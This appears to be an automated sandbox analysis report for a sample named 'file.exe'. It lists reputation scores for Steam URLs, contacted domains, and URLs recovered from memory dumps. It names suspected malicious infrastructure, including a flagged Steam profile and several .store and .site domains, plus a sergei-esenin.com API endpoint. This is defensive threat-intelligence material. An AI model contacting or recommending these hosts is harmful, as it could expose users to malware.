    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    https://steamcommunity.com:443/profiles/76561199724331900$0%VirustotalBrowse
    https://steamcommunity.com/market/0%VirustotalBrowse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%VirustotalBrowse
    https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319000%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi0%VirustotalBrowse
    https://steamcommunity.com/discussions/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=e0%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    clearancek.site18%VirustotalBrowse
    spirittunek.store22%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    mobbipenju.store22%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a0%VirustotalBrowse
    https://sergei-esenin.com:443/api19%VirustotalBrowse
    https://steamcommunity.com/profiles/765610%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA0%VirustotalBrowse
    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
    https://steamcommunity.com/workshop/0%VirustotalBrowse
    https://sergei-esenin.com/api19%VirustotalBrowse
    https://steamcommunity.com/0%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truetrueunknown
    sergei-esenin.com
    		104.21.53.8
    		truetrueunknown
    eaglepawnoy.store
    		unknown
    		unknowntrueunknown
    bathdoomgaz.store
    		unknown
    		unknowntrueunknown
    spirittunek.store
    		unknown
    		unknowntrueunknown
    licendfilteo.site
    		unknown
    		unknowntrueunknown
    studennotediw.store
    		unknown
    		unknowntrueunknown
    mobbipenju.store
    		unknown
    		unknowntrueunknown
    clearancek.site
    		unknown
    		unknowntrueunknown
    dissapoiznw.store
    		unknown
    		unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    bathdoomgaz.storetrueunknown
    studennotediw.storetrueunknown
    clearancek.sitetrueunknown
    dissapoiznw.storetrueunknown
    https://steamcommunity.com/profiles/76561199724331900true
    • URL Reputation: malware
    		unknown
    spirittunek.storetrueunknown
    licendfilteo.sitetrueunknown
    eaglepawnoy.storetrueunknown
    mobbipenju.storetrueunknown
    https://sergei-esenin.com/apitrueunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://steamcommunity.com:443/profiles/76561199724331900$file.exe, 00000000.00000002.2266194355.0000000001195000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://help.steampowered.com/en/file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://steamcommunity.com/market/file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://store.steampowered.com/news/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://steamcommunity.com/discussions/file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://store.steampowered.com/stats/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://sergei-esenin.com/p;file.exe, 00000000.00000003.2078215009.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmptrue
      		unknown
      https://steamcommunity.com/workshop/file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
      https://store.steampowered.com/legal/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://sergei-esenin.com/h;file.exe, 00000000.00000003.2078215009.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmptrue
        		unknown
        https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://upx.sf.netAmcache.hve.4.drfalse
        • URL Reputation: safe
        		unknown
        https://store.steampowered.com/file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmptrue
        • URL Reputation: malware
        		unknown
        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://www.cloudflare.com/learning/access-managfile.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.cloudflare.com/5xx-error-Xfile.exe, 00000000.00000002.2266194355.00000000011D1000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.2266194355.0000000001195000.00000004.00000020.00020000.00000000.sdmptrueunknown
            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://steamcommunity.com/profiles/76561file.exe, 00000000.00000002.2266194355.00000000011E6000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://store.steampowered.com/mobilefile.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://steamcommunity.com/file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
